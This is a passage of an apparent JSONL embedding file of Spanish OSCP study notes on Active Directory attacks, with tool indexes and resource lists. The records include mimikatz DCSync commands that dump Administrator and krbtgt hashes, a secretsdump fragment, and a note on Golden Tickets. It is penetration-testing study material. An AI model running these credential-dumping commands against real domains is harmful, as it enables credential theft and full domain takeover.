dominio/usuario:password@DC_IP # → ver secretsdump\n```\n```", "v": [-0.07048, -0.05614, -0.07986, -0.12014, -0.06512, -0.226, -0.0077, -0.05566, -0.11448, 0.16295, 0.07794, -0.07143, -0.08252, -0.17265, -0.13145, -0.06495, 0.10564, 0.07988, 0.10712, -0.07492, 0.12773, 0.0314, -0.08539, 0.00892, 0.00519, -0.05027, -0.00329, 0.15845, -0.05851, -0.01809, -0.00093, -0.08397, -0.07472, -0.02396, -0.08681, -0.08089, 0.05051, 0.04411, 0.06528, 0.25871, 0.02873, -0.02203, -0.16774, 0.1369, 0.01976, 0.03226, 0.02082, -0.06165, 0.07932, -0.17307, -0.15148, -0.07984, -0.08305, -0.00979, 0.03272, -0.02103, 0.07876, 0.02328, -0.02412, 0.05456, -0.01561, 0.0496, 0.02104, 0.11838, 0.04342, -0.11064, -0.03153, -0.11659, -0.04861, 0.08716, -0.01342, -0.02379, -0.00238, 0.03518, 0.10605, -0.0229, 0.05218, -0.0477, 0.1114, 0.10098, -0.09107, 0.03217, -0.05653, -0.00531, -0.09533, -0.08679, 0.03095, -0.08824, 0.01076, -0.015, 0.14026, 0.0536, -0.03688, 0.02296, 0.04548, -0.04135, 0.03952, -0.0006, -0.04026, -0.0787, -0.01869, 0.1452, -0.0585, 0.08095, 0.065, 0.04756, 0.03817, 0.02376, 0.04692, -0.06121, 0.05271, 0.02626, 0.09305, -0.00644, 0.04478, 0.04716, -0.03923, -0.031, 0.06332, 0.00794, -0.05283, -0.02406, 0.00175, 0.03474, 0.00325, -0.01449, -0.02628, 0.0209, 0.0088, -0.11161, -0.09815, -0.04995, 0.02537, 0.12499, 0.04753, 0.03161, -0.0519, -0.03731, -0.07542, -0.00747, 0.09013, -0.03902, -0.07535, 0.06624, 0.05302, -0.04884, 0.05791, -0.09773, -0.04878, 0.00087, 0.03242, -0.00287, -0.00886, 0.00514, 0.02466, 0.04514, -0.05598, -0.0542, 0.02002, -0.00692, -0.02699, 0.05847, -0.03194, 0.03611, 0.0241, -0.04245, 0.00118, -0.01736, 0.01323, -0.01772, 0.00307, -0.00216, -0.01132, -0.02241, -0.00695, -0.04031, 0.04725, -0.06697, 0.02471, -0.03951, 0.01414, -0.00972, 0.01277, 0.04423, -0.00583, 0.0186, 0.0596, -0.06897, -0.0292, -0.03277, 0.03098, -0.02003, -0.01201, 0.01061, 0.01489, -0.0454, -0.00872, -0.0349, 0.04056, -0.01671, 0.03408, 0.01903, -0.00277, -0.0009, 0.00061, -0.02044, 0.00122, -0.04867, -0.03371, -0.04906, 0.04649, -0.03807, 0.01394, -0.06686, -0.06962, -0.02769, -0.00967, 0.02808, -0.07381, -0.07326, -0.0172, 0.05538, 0.02245, -0.00918, 0.03083, 0.02177, 0.01827, -0.01107, 0.02577, 0.01011, -0.03353, 0.09262, -0.03903, -0.01462, 0.0685, -0.03774, -0.03767, 0.02556, -0.01522, -0.02285, -0.0434, 0.03213, 0.03343, -0.05886, -0.01746, -0.02647, -0.0353, 0.04134, 0.02388, 0.01492, -0.03548, -0.03082, -0.054, -0.01792, -0.01357, -0.00813]} +{"tipo": "metodologia", "herramienta": "DCSync", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "texto": "# o desde mimikatz en una máquina del dominio:\nlsadump::dcsync /user:Administrator\nlsadump::dcsync /user:krbtgt # ← el premio gordo\n```", "v": [0.07887, -0.16357, 0.05504, -0.07491, -0.14694, -0.08289, -0.16883, 0.14662, -0.12297, 0.06737, 0.03754, -0.13061, -0.03354, -0.2134, -0.13389, -0.16805, 0.08798, 0.03671, -0.02048, 0.0876, 0.0469, -0.05749, 0.00708, -0.02216, 0.15039, -0.01722, -0.02148, -0.01865, -0.07946, 0.1072, 0.04795, -0.05347, -0.12892, -0.00553, -0.03752, -0.06593, -0.02108, 0.00663, 0.11396, 0.25213, 0.03677, -0.02648, -0.13033, 0.01473, 0.05811, -0.11742, 0.06566, -0.08259, 0.05981, -0.10442, -0.04675, -0.07788, -0.05627, -0.04764, 0.05829, 0.02761, -0.01497, -0.06978, 0.06976, -0.03292, -0.02626, 0.06037, -0.12939, 0.01844, -0.11535, -0.09543, 0.08273, -0.0773, 0.00176, 0.05557, -0.04532, -0.08845, 0.06343, -0.08318, 0.10633, -0.02071, 0.01196, 0.05479, 0.11903, 0.01091, -0.08993, -0.0664, -0.03613, 0.00405, -0.03613, -0.12733, 0.11323, -0.02005, -0.01383, 0.00434, 0.05734, 0.0543, 0.05883, -0.02205, 0.00279, -0.11751, 0.02057, -0.03012, 0.06544, 0.03336, 0.07874, 0.06378, -0.03122, 0.03046, -0.05203, 0.03918, 0.0552, 0.03574, 0.02967, -0.03693, 0.1108, 0.03495, -0.01944, 0.04652, -0.07344, 0.0913, -0.03454, -0.05177, -0.02489, -0.05863, 0.01567, 0.0699, 0.05408, -0.05643, 0.0321, -0.0063, 0.03618, -0.00196, -0.05148, 0.03555, -0.03611, 0.00962, 0.06463, -0.0334, 0.04028, 0.02729, 0.02181, -0.01616, -0.02233, -0.02416, -0.07853, -0.01868, -0.04014, -0.00744, 0.02203, -0.06312, 0.00336, -0.15363, 0.01472, -0.05179, 0.06079, 0.0052, 0.00288, -0.05593, 0.11608, 0.05312, -0.02164, 0.00191, -0.0705, -0.02633, -0.03992, 0.05714, 0.04744, -0.00893, -0.0395, -0.03465, -0.04576, -0.02904, 0.01283, -0.02121, 0.04062, -0.01393, 0.04494, 0.02466, 0.02652, 0.02398, 0.00795, -0.01414, -0.05941, 0.0164, 0.05348, -0.00269, 0.04093, 0.00415, 0.06729, 0.01561, 0.01909, 0.00468, -0.04556, 0.00563, 0.02783, -0.02497, 0.0138, -0.01236, 0.06234, -0.03446, 0.00303, 0.02007, -0.03055, -0.00345, 0.03475, -0.01369, 0.03803, 0.04934, -0.07595, -0.03971, 0.04816, -0.0125, 0.04088, -0.06243, 0.06756, 3e-05, -0.00365, 0.01333, -0.01345, 0.0277, -0.09438, 0.05402, -0.04873, -0.07044, -0.02916, -0.00244, -0.02512, 0.03493, -0.01453, 0.06019, 0.00755, 0.00217, 0.04096, 0.01427, -0.05591, -0.02756, 0.01747, 0.00986, 0.02455, -0.04661, 0.00338, -0.00273, 0.05341, -0.05538, -0.043, -0.04532, 0.06102, -0.00034, -0.03994, 0.02065, -0.01319, 0.0221, -0.03921, 0.05442, 0.01158, -0.09578, -0.05608, 0.01175, -0.07197, 0.05474]} +{"tipo": "metodologia", "herramienta": "DCSync", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "texto": "## Por qué importa\nEl hash de **krbtgt** → Golden Ticket = control total y persistente del dominio.\n\nRelacionado: Mimikatz · Impacket · Active Directory · OSCP MOC", "v": [-0.14916, -0.11264, 0.06259, -0.06785, 0.0253, -0.1751, -0.00478, 0.16005, -0.25479, 0.03924, 0.05958, -0.01931, 0.02558, -0.0345, 0.09651, -0.01087, 0.08742, -0.0742, -0.08718, -0.0711, -0.00444, -0.0198, -0.01358, 0.00109, 0.11433, 0.07211, -0.07775, 0.07771, -0.08817, -0.01631, 0.02341, -0.12857, -0.10473, 0.02142, -0.07511, -0.13203, -0.04336, 0.09224, 0.1668, 0.12259, 0.0215, 0.01049, -0.07332, 0.16992, 0.16051, -0.02901, 0.04088, -0.01263, -0.04861, 0.00948, -0.08507, -0.05032, -0.12677, 0.01111, 0.07843, 0.04107, -0.10684, -0.05331, -0.07238, -0.00557, -0.03481, -0.11806, -0.12346, -0.05426, -0.0735, -0.07553, -0.04815, -0.09583, -0.03621, 0.07845, -0.00261, 0.06322, -0.00455, 0.00454, 0.12134, -0.06039, 0.17702, -0.03898, 0.07833, 0.08206, -0.02813, -0.09242, 0.04244, 0.00588, -0.02212, -0.16243, 0.02962, -0.13415, -0.04682, 0.02545, 0.11622, 0.0585, -0.02318, -0.00319, -0.0401, -0.08004, -0.10636, -0.02203, -0.02381, -0.00119, -0.02993, 0.14548, -0.03586, 0.08282, 0.09638, 0.03564, 0.09239, -0.04655, 0.08319, 0.07197, -0.00986, -0.03373, -0.03922, -0.07006, 0.00861, 0.04879, 0.01074, -0.03864, 0.07874, -0.0175, -0.03471, 0.05525, 0.09404, -0.00045, 0.06674, -0.0421, -0.03764, -0.00372, 0.02762, -0.04134, -0.0306, 0.02513, 0.03186, -0.0757, 0.02703, -0.0054, 0.02345, 0.03495, 0.03861, -0.04527, -0.06002, -0.06539, -0.02995, -0.01801, 0.03803, -0.06121, -0.0037, 0.00723, 0.04747, 0.03496, -0.04166, 0.03273, 0.02833, 0.0025, 0.08141, 0.05597, -0.04832, -0.00423, -0.05686, -0.00052, 0.08847, -0.00792, 0.00577, 0.06138, -0.04613, 0.03194, 0.00165, 0.02585, 0.00564, -0.00031, 0.01491, 0.03162, -0.02782, 0.00053, -0.02944, -0.07741, 0.02409, -0.03753, -0.00867, -0.1033, 0.061, -0.0183, 0.04564, 0.06849, -0.00079, 0.0387, 0.05897, 0.02318, 0.01992, -0.00348, 0.00125, 0.01386, -0.01845, 0.00764, -0.00158, -0.06408, 0.0502, -0.07013, -0.02088, -0.02112, 0.00493, -0.02074, 0.07059, 0.00518, 0.0424, -0.07422, -0.01741, 0.00915, -0.00279, 0.01259, -0.02258, 0.01513, 0.09581, 0.01562, -0.05093, 0.04272, -0.04151, -0.0075, -0.00267, -0.01656, 0.00564, 0.0298, 0.02268, -0.02534, 0.08654, 0.00506, 0.03423, -0.02462, 0.05869, 0.06898, -0.01409, -0.02791, 0.00764, -0.00592, 0.06267, -0.01835, -0.03972, -0.01851, -0.02875, -0.00905, -0.00906, 0.01451, 0.03463, 0.00439, -0.04725, -0.04763, -0.02681, 0.04337, -0.00393, -0.01927, 0.00859, -0.01533, -0.02831, -0.07726, -0.05535, 0.01241]} +{"tipo": "metodologia", "herramienta": "Recursos públicos", "perfil": "PENTESTERS", "tema": "referencia", "fichero": "conocimiento/07 - Referencia/Recursos públicos.md", "texto": "# Recursos públicos\n\n> Dónde está SÍ todo esto (cultura pública, nada bajo NDA). Apoyo para Metodología OSCP y el Reporte OSCP.\n\n| Recurso | Por qué importa |\n|---|---|\n| **TJ Null's OSCP-like list** (Reddit) | Máquinas HTB/THM equivalentes a OSCP, actualizada |\n| **ippsec.rocks** | Buscador de writeups por técnica (\"kerberoasting\" → te lista las máquinas) |\n| **0xdf.gitlab.io** | Writeups detalladísimos y pedagógicos |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web (SQL injection, LFI a RCE, uploads) |\n| **HackTricks** (book.hacktricks.xyz) | La biblia: lo busques lo que busques, está |\n| **GTFOBins / LOLBAS** | Privesc Linux y LOLBins Windows → GTFOBins y LOLBAS |\n| **/r/oscp** | Experiencias de examinados (sin spoilers) |\n| **Discords públicos**: HTB, TryHackMe, NetSecFocus | Comunidades que SÍ puedes consultar |\n| **noraj/OSCP-Exam-Report-Template-Markdown** | Plantilla del Reporte OSCP |\n\n> Compilado de cultura pública (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB). **No** es material bajo NDA de OffSec.\n\nRelacionado: un laboratorio · OSCP MOC", "v": [-0.14669, -0.19356, 0.01144, -0.00912, 0.11751, -0.33416, -0.05372, 0.02569, -0.01087, 0.15449, -0.0752, -0.12057, 0.09026, 0.01075, 0.03166, -0.02981, -0.0299, -0.0982, -0.00918, -0.03632, -0.05884, 0.03746, -0.26516, 0.01342, 0.17634, 0.02533, -0.0355, -0.0545, -0.18826, -0.0618, -0.03988, -0.06793, -0.11029, 0.02346, -0.15009, 0.00177, 0.00295, -0.05615, 0.01002, 0.19935, -0.01414, 0.1093, -0.07175, 0.15051, 0.09198, -0.12479, 0.11687, 0.01166, 0.01067, -0.09995, -0.01516, -0.0783, -0.14392, -0.00654, -0.05318, 0.01594, 0.02752, 0.03397, -0.04276, 0.03308, -0.01529, 0.05878, -0.06126, -0.18033, 0.07309, -0.02981, 0.05761, -0.06506, -0.03467, 0.08211, -0.04752, 0.01454, -0.03502, -0.09302, 0.03457, -0.07516, 0.08781, -0.05817, 0.10206, 0.01278, -0.06743, -0.08904, 0.00517, 0.05055, -0.05584, -0.05781, 0.10743, 0.00258, -0.01849, -0.07975, 0.07475, 0.02453, 0.00417, 0.04081, 0.02471, -0.1609, 0.04466, 0.02666, 0.01513, -0.01485, -0.02533, 0.03907, -0.04513, 0.04089, -0.0617, 0.05708, 0.08024, -0.03283, 0.05621, 0.02991, 0.13017, 0.0398, 0.03479, 0.06253, -0.00656, -0.02322, -0.03083, 0.04711, 0.02527, -0.01139, -0.01214, 0.03786, -0.02923, -0.03683, 0.03676, 0.00183, 0.03284, 0.05299, -0.0116, 0.0159, 0.02776, -0.00438, -0.03607, 0.01067, -0.0707, 0.01016, 0.02085, -0.04342, 0.03233, -0.02016, 0.05393, 0.0425, 0.04891, 0.05565, 0.03701, 0.0033, 0.03047, -0.06579, -0.01883, 0.01076, 0.05148, 0.01052, -0.00277, 0.00957, -0.00897, -0.07555, 0.05148, -0.02623, -0.08738, 0.02958, -0.01257, 0.02524, 0.02237, 0.00283, -0.07372, 0.03043, 0.03493, -0.02543, 0.0178, -0.04994, -0.0187, -0.02656, -0.01029, -0.03789, 0.02472, -0.07792, 0.05811, -0.03372, -0.01671, -0.04418, 0.04474, -0.00361, 0.0261, -0.0004, -0.02619, -0.03856, 0.02892, -0.03626, 0.01509, -0.00033, 0.00504, 0.01705, 0.05269, -0.01656, 0.00866, -0.00044, 0.00642, -0.04948, -0.01057, 0.00042, -0.05246, -0.01749, -0.03518, -0.0328, 0.00593, -0.02212, 0.0053, 0.01441, -0.04479, -0.01585, 0.0495, -0.03867, 0.00397, -0.06223, -0.02593, 0.01803, 0.00051, 0.03343, -0.00071, -0.00017, -0.03308, 0.05357, 0.05546, -0.0136, 0.0006, -0.00214, -0.00545, -0.02203, 0.02872, -0.02583, 0.01128, 0.00373, 0.04932, -0.06327, 0.00978, 0.03617, -0.0265, -0.01577, -0.03719, -0.03084, -0.00389, 0.02059, -0.01512, -0.04208, -0.05452, -0.04843, -0.01423, -0.01974, 0.01145, -0.02545, 0.0052, -0.01122, -0.02707, -0.07721, -0.01574, 0.00374]} +{"tipo": "metodologia", "herramienta": "Herramientas (índice)", "perfil": "PENTESTERS", "tema": "referencia", "fichero": "conocimiento/07 - Referencia/Herramientas (índice).md", "texto": "# Herramientas (índice)\n\n> Arsenal de referencia. Fuente: oscp.trastero.org/tools + el resto del vault.", "v": [0.09622, -0.16701, -0.02973, -0.20622, 0.00675, -0.02795, -0.00419, -0.19323, -0.08781, 0.07044, -0.08187, -0.17351, 0.00104, 0.08443, 0.16773, 0.00871, 0.04667, -0.08938, 0.05809, 0.01343, -0.02354, 0.0093, -0.11217, 0.00503, -0.00991, -0.03342, -0.2086, 0.00168, -0.037, -0.03936, -0.10087, -0.03558, -0.10053, -0.0184, -0.14206, -0.15473, -0.00415, 0.0721, 0.04532, 0.06633, -0.02944, 0.12246, -0.05354, 0.17106, 0.01988, -0.00196, 0.05789, 0.08935, 0.16003, -0.02685, 0.02044, -0.19831, -0.03931, 0.03367, 0.00513, 0.08034, 0.03669, 0.09402, 0.07679, -0.10686, 0.01709, 0.0089, -0.07866, -0.0856, 0.00213, 0.03767, -0.0712, -0.02736, -0.04667, -0.07779, -0.15916, 0.01144, -0.01196, 0.0497, -0.01854, -0.09625, 0.0604, -0.02726, -0.0311, 0.07056, -0.03036, -0.06826, 0.0874, -0.14818, 0.01657, -0.01614, 0.04416, 0.05024, 0.07191, -0.11556, 0.02692, 0.00248, -0.07398, -0.02663, -0.03837, -0.01829, -0.04444, -0.0143, 0.09725, -0.03907, 0.03747, 0.0492, 0.06514, -0.02484, 0.08581, 0.03755, -0.07329, -0.01343, -0.02507, 0.03994, 0.04546, 0.10412, 0.01436, 0.02759, 0.00858, 0.03832, -0.1164, 0.08767, -0.07292, -0.00105, 0.13923, -0.02368, -0.04943, 0.03759, -0.07448, -0.00462, 0.06697, -0.00908, 0.08199, -0.05912, -0.02303, -0.02146, -0.03038, 0.01276, 0.0313, -0.0508, 0.11927, 0.01683, 0.04113, 0.00772, 0.02265, 0.02267, -0.01617, 0.00667, 0.0424, -0.07212, 0.07049, -0.03811, -0.04583, -0.00055, 0.02585, 0.01438, 0.10857, -0.02369, 0.09423, 0.02661, 0.02528, 0.00866, -0.11516, -0.06597, -0.0289, 0.02387, 0.01377, 0.06173, -0.023, 0.0338, 0.13556, -0.07775, -0.00252, 0.01444, 0.06939, 0.0213, 0.01411, -0.06424, 0.03411, -0.05737, 0.04645, -0.07368, -0.00469, 0.03724, 0.0266, 0.00014, -0.02967, -0.01735, -0.00848, -0.01143, 0.02922, -0.05385, -0.03408, -0.00563, -0.08473, -0.0251, 0.01837, -0.02101, 0.04837, 0.00827, -0.00987, 0.02674, 0.00736, -0.03395, -0.04546, -0.01849, 0.02984, 0.06286, 0.01801, -0.03175, -0.01781, -0.04789, 0.03105, -0.00099, 0.00353, -0.01933, 0.03672, 0.01025, -0.02345, 0.00561, -0.02078, 0.01973, -0.05098, -0.02627, -0.01181, -0.00999, 0.00437, 0.02264, -0.0463, -0.06213, -0.02442, -0.03572, -0.01865, -0.02183, 0.06287, -0.00647, 0.07833, -0.02355, -0.0044, -0.09274, -0.00643, 0.00839, -0.01133, 0.00864, -0.00929, -0.01732, -0.00869, -0.02649, -0.02098, -0.00335, 0.0126, -0.03789, -0.01609, -0.01699, 0.00574, -0.03875, 0.0161, -0.05382, -0.02814, -0.02498]} +{"tipo": "metodologia", "herramienta": "Herramientas (índice)", "perfil": "PENTESTERS", "tema": "referencia", "fichero": "conocimiento/07 - Referencia/Herramientas (índice).md", "texto": "## En Kali (corren en tu atacante)\n| Tool | Para qué | Nota |\n|---|---|---|\n| Impacket | suite de protocolos Windows | Impacket |\n| NetExec / CrackMapExec | barrido y post-explotación AD | SMB, Pass-the-Hash |\n| BloodHound | grafo de AD | BloodHound |\n| Responder | envenena LLMNR/NBT-NS/MDNS → captura hashes | Client-side attacks |\n| Evil-WinRM | shell WinRM (5985) | Movimiento lateral |\n| ligolo-ng / chisel | pivoting/túnel | Pivoting ligolo-ng, Tunneling |\n| Kerbrute | enum de usuarios + spraying Kerberos | AS-REP Roasting |\n| Rubeus | operaciones con tickets Kerberos | Kerberoasting, Silver Ticket |\n| hashcat / john | cracking offline | Cracking de contraseñas |", "v": [-0.0528, -0.23557, 0.14612, -0.13716, 0.04265, -0.12484, -0.157, 0.09913, 0.05916, 0.09136, -0.08923, -0.18877, 0.10539, 0.00313, -0.00027, 0.0571, -0.22127, -0.02549, 0.08874, 0.07087, -0.12397, 0.09311, -0.15511, -0.00215, 0.08864, 0.0546, -0.08263, 0.13302, -0.12297, 0.00851, -0.14499, -0.07017, -0.00911, 0.04833, -0.07276, -0.04996, -0.00078, 0.03712, 0.04771, 0.22756, -0.03675, 0.0945, -0.09467, 0.12446, 0.06054, -0.13408, 0.03137, -0.05909, 0.07056, 0.02314, 0.05739, -0.01475, -0.21655, -0.08184, -0.02288, 0.00254, 0.03853, -0.02233, -0.0794, 0.04032, 0.03888, -0.03387, -0.01706, 0.00125, -0.00901, -0.01518, 0.07379, -0.03691, 0.00843, 0.11521, -0.03754, 0.04401, 0.05658, 0.03509, 0.02248, -0.07481, 0.08246, -0.0482, 0.05003, 0.09457, -0.05862, 0.04151, 0.00176, 0.00645, -0.0179, 0.0405, -0.00695, -0.01781, 0.03544, -0.00353, -0.01666, -0.03101, 0.01552, 0.06691, 0.02082, -0.13585, -0.0869, 0.00127, -0.04218, -0.08264, -0.04664, 0.00089, -0.10732, 0.0546, 0.0261, -0.03091, -0.01325, 0.02905, 0.01693, 0.02563, 0.13995, 0.03269, 0.05678, 0.04054, -0.00842, 0.02799, 0.01697, 0.05478, 0.06188, -0.00118, 0.05194, 0.00553, -0.02822, -0.01497, -0.02083, -0.05731, -0.03335, 0.01303, -0.0728, -0.07039, 0.01424, 0.0248, -0.05295, 0.02132, -0.037, 0.02848, 0.0604, -0.01363, 0.01476, 0.0291, -0.03807, -0.02765, -0.00279, 0.1494, 0.0259, 0.05363, 0.01541, -0.03184, -0.00687, -0.01484, 0.01058, -0.03779, -0.10079, -0.03653, -0.00354, -0.0651, 0.00913, 0.04825, -0.10762, 0.0239, -0.01195, 0.00814, -0.02586, 0.06814, -0.09337, 0.02939, 0.05309, -0.02086, -0.01419, -0.01445, 0.02218, 0.00881, 0.04233, 0.00892, 0.03166, -0.00157, 0.07641, 0.01237, -0.00455, -0.05624, 0.07556, -0.11219, 0.0795, 0.02346, 0.00852, 0.01013, 0.01728, 0.00127, 0.00496, -0.05998, -0.05559, -0.02284, 0.04396, 0.02818, -0.01266, 0.028, 0.08232, -0.012, -0.04563, -0.01752, 0.0163, 0.03151, 0.04751, -0.02865, 0.04147, 0.00019, 0.01534, -0.04846, 0.03282, 0.00109, 0.02578, 0.02371, -0.01907, -0.03287, -0.0314, -0.01246, -0.04137, -0.01507, 0.02864, -0.01199, -0.05367, -0.00327, 0.00334, 0.03564, -0.01929, 0.00072, -0.05756, -0.05328, -0.04301, -0.06266, 0.03561, -0.0312, 0.01715, 0.06471, -0.03304, -0.03751, -0.0501, -0.01726, 0.01439, 0.03397, -0.02819, -0.05008, 0.0116, 0.02506, -0.0192, -0.0431, 0.00502, -0.04579, -0.01964, 0.0049, -0.01377, 0.015, -0.05768, 0.02402, -0.0472, 0.03492]} +{"tipo": "metodologia", "herramienta": "Herramientas (índice)", "perfil": "PENTESTERS", "tema": "referencia", "fichero": "conocimiento/07 - Referencia/Herramientas (índice).md", "texto": "## Las que SUBES a la víctima Windows\n| Tool | Para qué | Nota |\n|---|---|---|\n| winPEAS | enumeración de privesc | PEASS-ng |\n| PowerUp / PrivescCheck / Sherlock | privesc PowerShell | Privesc Windows |\n| mimikatz | volcar credenciales de LSASS | Mimikatz |\n| SysInternals (accesschk, PsExec) | permisos, ejecución | Privesc Windows |\n| Nishang | PowerShell ofensivo (shells) | Reverse shell |\n| Potato (God/Print/Juicy) | abuso de token → SYSTEM | Potato attacks |", "v": [-0.08247, -0.1534, 0.07209, -0.12172, 0.12218, -0.10075, -0.12234, -0.19838, 0.10224, 0.00722, -0.00139, 0.08206, 0.00877, -0.00143, -0.06431, 0.00258, -0.07003, 0.00244, 0.0391, 0.13167, -0.02361, -0.00253, -0.24255, -0.07768, 0.15608, 0.16582, -0.0789, 0.1001, -0.12985, -0.01802, -0.14951, -0.02225, -0.10959, -0.06102, -0.04426, 0.00197, -0.01379, 0.00649, 0.14482, 0.22577, 0.00384, 0.17015, -0.06513, 0.13735, 0.10578, -0.0922, 0.05892, -0.01011, 0.06737, -0.02847, -0.0294, -0.08839, -0.13794, -0.07082, 0.04398, 0.02676, 0.0049, 0.0037, -0.08391, 0.03231, -0.09702, 0.00493, 0.008, 0.01956, 0.05757, -0.04414, 0.04624, -0.07876, 0.02935, 0.14777, -0.02518, -0.06685, 0.06784, -0.04226, 0.00677, -0.11512, 0.00905, -0.05401, 0.03658, -0.00618, -0.1111, 0.03687, -0.01036, -0.02877, 0.03288, 0.07187, -0.02356, -0.06161, 0.0226, -0.07142, 0.05837, -0.02764, -0.02901, 0.12663, 0.00038, -0.06564, -0.14597, -0.00636, -0.06019, -0.01007, 0.0042, -0.07276, -0.07318, 0.07158, 0.01575, -0.0084, -0.06714, 0.04183, -0.03445, -6e-05, 0.11113, 0.03948, 0.07795, -0.0055, 0.00365, 0.01989, -0.07807, 0.02184, 0.03086, -0.03505, 0.06663, -0.02522, -0.03317, -0.02835, 0.01697, -0.0271, -0.0153, 0.02362, -0.0861, -0.04266, 0.06236, -0.00073, 0.0822, 0.01118, -0.00732, 0.0649, 0.05983, -0.02181, 0.03423, -0.01568, 0.02529, 0.01764, 0.03519, 0.08702, 0.03482, -0.00325, -0.02652, 0.0217, 0.02486, -0.01002, 0.01272, 0.01181, -0.05199, -0.02, -0.00043, -0.03161, 0.01902, 0.07133, -0.03483, -0.05373, 0.02051, 0.0329, -0.04795, 0.04225, -0.09503, -0.05491, 0.05909, 0.00235, 0.00034, -0.0072, 0.00717, -0.01629, 0.01019, -0.01616, 0.02479, -0.0085, 0.06392, 0.05154, -0.06747, -0.03447, 0.01287, -0.06272, 0.02412, -0.01732, -0.01349, 0.0438, -0.08068, 0.01224, -0.02923, -0.02674, -0.08214, -0.00465, 0.11013, -0.03446, 0.02907, 0.06132, 0.01776, -0.04095, -0.05024, -0.00824, 0.02271, 0.02862, -0.0329, -0.0077, 0.05267, 0.01521, 0.03878, -0.04799, 0.05483, -0.07999, 0.03706, 0.01936, 0.0213, -0.03226, -0.03166, -0.00596, -0.07535, -0.01133, 0.02034, 0.0048, -0.07656, 0.01043, 0.03377, 0.04008, 0.03138, 0.02415, -0.0435, -0.04621, -0.04396, -0.03959, -0.00412, -0.01907, 0.04251, 0.07108, -0.035, -0.06196, -0.05731, -0.01979, 0.02674, 0.02435, -0.0458, -0.01713, 0.02081, -0.01277, -0.05841, -0.00758, 0.01716, -0.02996, -0.01863, -0.0105, 0.02945, -0.02326, -0.07441, -0.02943, -0.05283, -0.00548]} +{"tipo": "metodologia", "herramienta": "Herramientas (índice)", "perfil": "PENTESTERS", "tema": "referencia", "fichero": "conocimiento/07 - Referencia/Herramientas (índice).md", "texto": "## En la víctima Linux\n| Tool | Para qué | Nota |\n|---|---|---|\n| linPEAS / LinEnum / LES / lse | enumeración de privesc | Privesc Linux |\n| pspy | espía procesos/cron sin root | Privesc Linux |\n\nRelacionado: searchsploit · Recursos públicos · OSCP MOC", "v": [-0.07785, -0.06367, -0.00813, -0.18653, 0.05875, -0.26067, -0.12665, -0.03767, -0.03178, 0.04281, 0.06881, -0.02835, 0.12621, -0.09628, 0.00943, -0.08899, -0.11074, -0.03601, -0.01238, -0.07182, -0.1922, 0.10991, -0.23703, -0.02155, 0.1419, 0.07627, 0.08373, -0.06722, 0.03942, 0.06133, -0.18852, 0.07737, -0.02252, 0.11434, -0.0669, 0.07485, 0.06715, -0.00133, 0.11909, 0.20811, 0.10181, 0.01159, -0.03667, 0.1638, -0.06187, -0.25253, 0.00327, 0.02992, 0.05626, -0.09629, -0.02305, -0.02737, -0.09194, -0.07793, 0.0515, 0.05775, 0.03843, -0.04304, 0.05148, 0.04654, -0.13747, -0.00437, -0.00169, -0.0671, 0.07374, 0.02161, 0.05386, -0.04068, -0.08099, 0.02781, 0.01135, 0.08983, -0.0461, -0.03153, 0.03947, -0.09437, -0.01754, -0.00981, 0.06889, 0.0477, -0.02555, 0.02085, 0.04722, -0.00082, -0.05317, -0.03102, 0.03986, 0.10631, 0.0025, 0.02826, 0.04654, 0.05738, -0.02537, 0.07668, 0.07632, -0.04977, 0.00054, 0.01155, -0.01393, -0.01878, 0.00665, 0.03488, -0.04463, 0.09749, 0.02542, -0.05854, 0.00363, 0.06963, -0.01457, -0.00113, 0.08931, 0.00861, 0.05307, 0.01838, -0.02983, -0.03495, -0.04866, 0.01623, 0.00469, -0.03137, 0.01874, -0.00333, -0.01879, -0.04801, -0.01752, -0.02834, -0.021, 0.05072, -0.02688, -0.07605, 0.05869, -0.09869, 0.05905, 0.0218, -0.01024, 0.01527, 0.05521, -0.04975, 0.05227, -0.00565, -0.02011, -0.0023, -0.00127, 0.06052, 0.09997, -0.02905, 0.03625, -0.059, 0.02888, -0.07533, -0.00223, -0.06918, -0.02473, -0.04138, -0.05003, -0.0828, -0.02993, 0.02615, -0.0908, -0.05215, 0.0195, -0.00067, -0.03697, 0.01479, -0.07651, -0.01475, 0.09861, 0.04891, -0.01475, -0.02567, 0.03328, -0.00822, -0.00839, -0.02502, 0.02618, -0.10993, 0.0887, -0.0235, -0.04597, 0.02098, 0.05708, -0.03084, 0.06064, -0.00524, 0.03144, -0.0023, -0.04544, 0.01108, -0.00825, -0.02925, -0.0008, -0.02853, 0.06097, -0.01133, -0.00444, 0.07755, -0.00475, 0.00092, -0.04175, -0.00697, 0.00285, 0.05528, 0.01514, 0.00979, 0.00805, -0.02956, 0.01083, -0.05402, 0.02117, -0.04004, 0.01666, 0.06344, 0.01764, -0.00652, 0.00437, 0.01498, -0.03522, 0.0555, 0.0381, 0.00793, -0.04114, -0.01143, 0.0388, -0.0103, -0.00641, -0.02031, -0.01736, -0.02984, -0.02317, -0.0723, 0.01116, -0.03368, 0.04203, 0.05622, -0.03308, -0.04743, -0.0485, 0.00645, 0.04089, 0.00881, -0.04943, -0.00165, 0.00429, -0.02336, -0.05461, -0.02454, 0.00958, -0.0419, -0.02693, -0.01589, 0.00104, -0.00651, -0.0376, -0.01907, -0.0869, 0.01298]} +{"tipo": "metodologia", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "texto": "# Reglas de herramientas (examen)\n\n> Qué puedes y qué no puedes usar en el examen OSCP.", "v": [-0.13217, -0.0417, -0.05703, -0.14786, 0.07853, -0.17587, -0.05474, 0.02457, -0.07121, -0.09029, -0.21214, -0.01536, -0.14254, -0.00723, 0.00587, 0.11341, 0.00163, 0.01996, -0.04319, -0.00681, -0.05186, -0.10553, -0.19806, 0.1192, 0.02095, 0.13297, -0.0274, -0.02865, -0.06971, -0.01318, -0.01784, 0.09051, 0.03226, -0.14346, -0.08842, 0.02388, -0.01614, -0.02434, 0.036, 0.15242, 0.03971, 0.06651, -0.059, 0.05504, 0.0998, -0.0416, 0.04325, 0.1608, -0.12953, -0.07246, -0.04544, -0.10004, -0.04269, -0.03236, -0.02979, -0.03749, 0.11573, 0.02516, 0.09051, -0.12637, 0.0572, 0.01688, -0.04554, -0.04442, 0.0323, -0.09073, -0.05158, 0.01809, 